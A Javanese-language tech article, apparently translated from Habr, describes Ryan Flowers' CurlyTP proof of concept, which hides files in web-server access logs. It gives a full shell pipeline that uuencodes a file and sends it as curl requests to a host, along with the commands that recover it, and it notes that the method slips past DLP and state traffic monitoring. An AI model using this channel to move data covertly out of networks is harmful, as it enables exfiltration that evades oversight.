Miturut definisi Wikipedia, drop mati minangka alat konspirasi sing digunakake kanggo ijol-ijolan informasi utawa sawetara barang antarane wong nggunakake lokasi rahasia. Ide kasebut yaiku wong ora tau ketemu - nanging isih ijol-ijolan informasi kanggo njaga keamanan operasional.

Panggonan ndhelik ngirim ora narik kawigaten manungsa waé. Mulane, ing donya offline asring nggunakake barang-barang sing wicaksana: bata sing ngeculake ing tembok, buku perpustakaan, utawa kothong ing wit.

Ana akeh alat enkripsi lan anonim ing Internet, nanging kasunyatane nggunakake alat kasebut narik kawigaten. Kajaba iku, bisa uga diblokir ing tingkat perusahaan utawa pemerintah. Apa sing kudu ditindakake?

Pangembang Ryan Flowers ngusulake pilihan sing menarik - gunakake server web apa wae minangka papan ndhelik. Yen sampeyan mikir babagan iki, apa sing ditindakake server web? Nampa panjalukan, ngetokake file lan nulis log. Lan log kabeh panjalukan, malah sing salah!

Pranyata manawa server web apa wae ngidini sampeyan nyimpen meh kabeh pesen ing log. Kembang kepingin weruh carane nggunakake iki.

Dheweke nawakake pilihan iki:

1. Njupuk file teks (pesen rahasia) lan ngitung hash (md5sum).
2. Kita encode (gzip+uuencode).
3. Kita nulis menyang log nggunakake panyuwunan sing ora bener menyang server.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Kanggo maca file, sampeyan kudu nindakake operasi kasebut kanthi urutan mbalikke: decode lan unzip file kasebut, priksa hash (hash bisa dikirim kanthi aman liwat saluran sing mbukak).

Spasi diganti karo =+=supaya ora ana spasi ing alamat. Program kasebut, sing diarani penulis CurlyTP, nggunakake enkoding base64, kaya lampiran email. Panjaluk kasebut digawe nganggo tembung kunci ?transfer?supaya panampa bisa gampang nemokake ing log.

Apa sing kita deleng ing log ing kasus iki?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Kaya sing wis kasebut, kanggo nampa pesen rahasia sampeyan kudu nindakake operasi kanthi urutan mbalikke:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Proses kasebut gampang diotomatisasi. Md5sum cocog, lan isi file konfirmasi sing kabeh wis decoded bener.

Cara kasebut gampang banget. "Intine latihan iki mung kanggo mbuktekake manawa file bisa ditransfer liwat panjaluk web cilik sing ora salah, lan bisa digunakake ing server web sing nganggo log teks biasa. Intine, saben server web minangka papan sing ndhelik!” tulis Flowers.

Mesthi, cara kasebut mung bisa digunakake yen panampa nduweni akses menyang log server. Nanging akses kasebut diwenehake, contone, dening akeh hoster.

Carane nggunakake?

Ryan Flowers ujar manawa dheweke dudu pakar keamanan informasi lan ora bakal nggawe dhaptar panggunaan CurlyTP. Kanggo dheweke, iki mung minangka bukti konsep manawa alat sing dikenal saben dina bisa digunakake kanthi cara sing ora konvensional.

Nyatane, cara iki duwe sawetara kaluwihan tinimbang server liyane sing "dhelikake" kaya Digital Mati Drop utawa PirateBox: ora mbutuhake konfigurasi khusus ing sisih server utawa protokol khusus - lan ora bakal nggawe curiga ing antarane sing ngawasi lalu lintas. Ora mungkin sistem SORM utawa DLP bakal mindai URL kanggo file teks sing dikompres.

Iki minangka salah sawijining cara kanggo ngirim pesen liwat file layanan. Sampeyan bisa ngelingi carane sawetara perusahaan majeng digunakake kanggo panggonan Proyek Pangembang ing Header HTTP utawa ing kode kaca HTML.

Ide iki mung pangembang web sing bakal weruh endhog Paskah iki, amarga wong normal ora bakal ndeleng header utawa kode HTML.

Source: www.habr.com